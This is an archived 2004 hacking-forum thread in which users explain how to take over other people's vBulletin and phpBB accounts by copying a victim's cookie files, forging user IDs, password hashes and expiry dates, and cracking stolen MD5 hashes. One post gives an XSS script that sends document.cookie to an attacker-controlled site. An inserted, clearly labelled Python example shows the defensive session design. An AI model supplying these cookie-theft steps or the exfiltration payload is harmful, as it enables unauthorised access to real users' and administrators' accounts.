
extreme
I am wondering, where are passwords for some board contained? VBulletin to be precise... They are not in the protected storage, so they must be in cookie or something.. Now, if I have access to someone's computer, how would I transfer his cookie to my machine in order to get his username and password of that forum?? Or, how do I get in the forum using his cookies, then maybe I don't even have to know what is password?
saetji
Download cain. First thing it shows are all the stored passes in autocomplete ;)
next tab, press + for default pass, connection pass etc
extreme
Yes, but I said Prot. storage doesn't show anything.. And I don't wish to use keylogger..
I am specifically interested how to use his cookies on my comp..
nulladd
the cookie file would be called something like "username@site.com" in ur cookies directory - C:\Documents and Settings\username\Cookies

1. Get an app that can modify cookies
this is a nice free one but there are probably many others
http://members.lycos.co.uk/nirsoft1/utils/iecookies.html

2. copy the cookie file from victims computer (or use XSS)

3. change the username to urs (i think that should work) or
can modify ur own cookie (assuming u have logged in to the site)
simply substitute ur username, id and password hash for the ones contained in the other cookie file u have "acquired" - this method has been tested on invision, xmbforum and phpbb so VBulletin should be no different

Note:
if u have grabbed someone else's cookie it may have expired, but that is no problem cause u can change the expiration date as well from that nirsoft app


a cookie file could also be stolen using cross site scripting (XSS), eg:
CODE

<script>document.write('<iframe src="www.mybadsite.com/add.php?c="'+document.cookie()+'"></iframe>')</script>
that is a cut down version of one method i have seen where the cookie is sent to a script that adds it to a database
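Added example, not part of the thread and not code from any of the forum packages named in it: a Python sketch of why a cookie that carries the user id and stored password hash is password-equivalent, next to a server-side session design where the cookie is a random token, expiry is enforced on the server, and `HttpOnly` keeps scripts from reading it. The names `USERS`, `SESSIONS`, `legacy_cookie_check`, `issue_session`, `validate_session` and `revoke_user_sessions` are hypothetical, and the user table is constructed sample data.

```python
import hashlib
import secrets
import time

# Constructed sample user table: user id -> stored password hash (as a board would keep it).
USERS = {"1": hashlib.md5(b"constructed-sample-password").hexdigest()}
SESSIONS = {}        # sha256(token) -> (user_id, expires_at); stands in for a DB table
SESSION_TTL = 3600   # seconds; enforced server-side, not by the cookie's own date

def legacy_cookie_check(cookie, users):
    """Weak design: the cookie carries user id + stored hash, so the hash alone logs in."""
    stored = users.get(cookie.get("userid"))
    return stored is not None and secrets.compare_digest(stored, cookie.get("passhash", ""))

def issue_session(user_id, now=None):
    """Hardened design: random token unrelated to the password; only its digest is stored."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    SESSIONS[hashlib.sha256(token.encode()).hexdigest()] = (user_id, now + SESSION_TTL)
    # HttpOnly: not readable via document.cookie. Secure: HTTPS only.
    header = f"sid={token}; Max-Age={SESSION_TTL}; Path=/; HttpOnly; Secure; SameSite=Lax"
    return token, header

def validate_session(token, now=None):
    """Return the user id for a live session, or None. Client-side expiry edits are ignored."""
    now = time.time() if now is None else now
    key = hashlib.sha256(token.encode()).hexdigest()
    entry = SESSIONS.get(key)
    if entry is None:
        return None
    user_id, expires_at = entry
    if now >= expires_at:
        del SESSIONS[key]
        return None
    return user_id

def revoke_user_sessions(user_id):
    """Call on logout or password change so a copied cookie stops working at once."""
    stale = [k for k, (uid, _) in SESSIONS.items() if uid == user_id]
    for key in stale:
        del SESSIONS[key]
    return len(stale)
```

With the second design a leaked password hash is not a login credential, and a copied session cookie dies at server-side expiry or on revocation, whatever date the client writes into the cookie file.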
extreme
It won't work.. I don't know why.. I logged in with my username.. There was cookie created.. So without logging out, I modified my cookie, changed userID and Password.. Then I saved it and clicked refresh... Nothing.. I was still logged in, but with my username.. So I checked cookie again to see if refresh have maybe returned old values (my userID), but no.. There was fakeID in there.. Then I logged out, and copied modified cookie again, then returned to site, but it said Please login..
I don't get it.. It seems like script is not reading my details from cookie at all..
nulladd
in IEcookiesview right click on the modified cookie and click "open web site"
also check if there r other values vBulletin has that u can substitute in (if any) and that the expiration date/time is greater than today's date/time
extreme
I will try it next time..
Now I just fired MD5 crack, and cracked the hash...
The irony was that I had to do it twice since my sister turned off my computer on 99% finished.. Don't you wanna kill them sometimes :P
niko
QUOTE (extreme @ Mar 29 2004, 08:35 AM)
It won't work.. I don't know why.. I logged in with my username.. There was cookie created.. So without logging out, I modified my cookie, changed userID and Password.. Then I saved it and clicked refresh... Nothing.. I was still logged in, but with my username.. So I checked cookie again to see if refresh have maybe returned old values (my userID), but no.. There was fakeID in there.. Then I logged out, and copied modified cookie again, then returned to site, but it said Please login..
I don't get it.. It seems like script is not reading my details from cookie at all..

It's not a good idea to mod a cookie with notepad or the like. It's much better to fake the cookie completely with a small proxy like proxomitron or such. Or you can use "cookie editor" program, but I like proxy method better, because the cookie editor still restricts the cookie size to the originally set size. With proxy you can make the cookie into whatever you want, perfect for testing cookie SQL injections..... :ph34r:

-niko
mrwhit3
is there some howto on how to do this? i used the latest Phpbb 2.0.8 Sql Injection Exploit to get a hash from a phpbb forum but the hash is pretty secure, I've been trying to crack it for about ahh 15 hrs with mdcrack so I'm looking at trying to edit a cookie of my own.. i have the admin user name and also the hash
nulladd
QUOTE (mrwhit3 @ Mar 30 2004, 04:14 PM)
I'm looking at trying to edit a cookie of my own.. i have the admin user name and also the hash

if u have that then u should have no probs using the above method
Yorn
QUOTE (extreme @ Mar 29 2004, 11:50 AM)
The irony was that I had to do it twice since my sister turned off my computer on 99% finished.. Don't you wanna kill them sometimes :P

Yeah, but then I did, and the media had a heyday with my life. So I haven't killed any of the other ones.

Yet.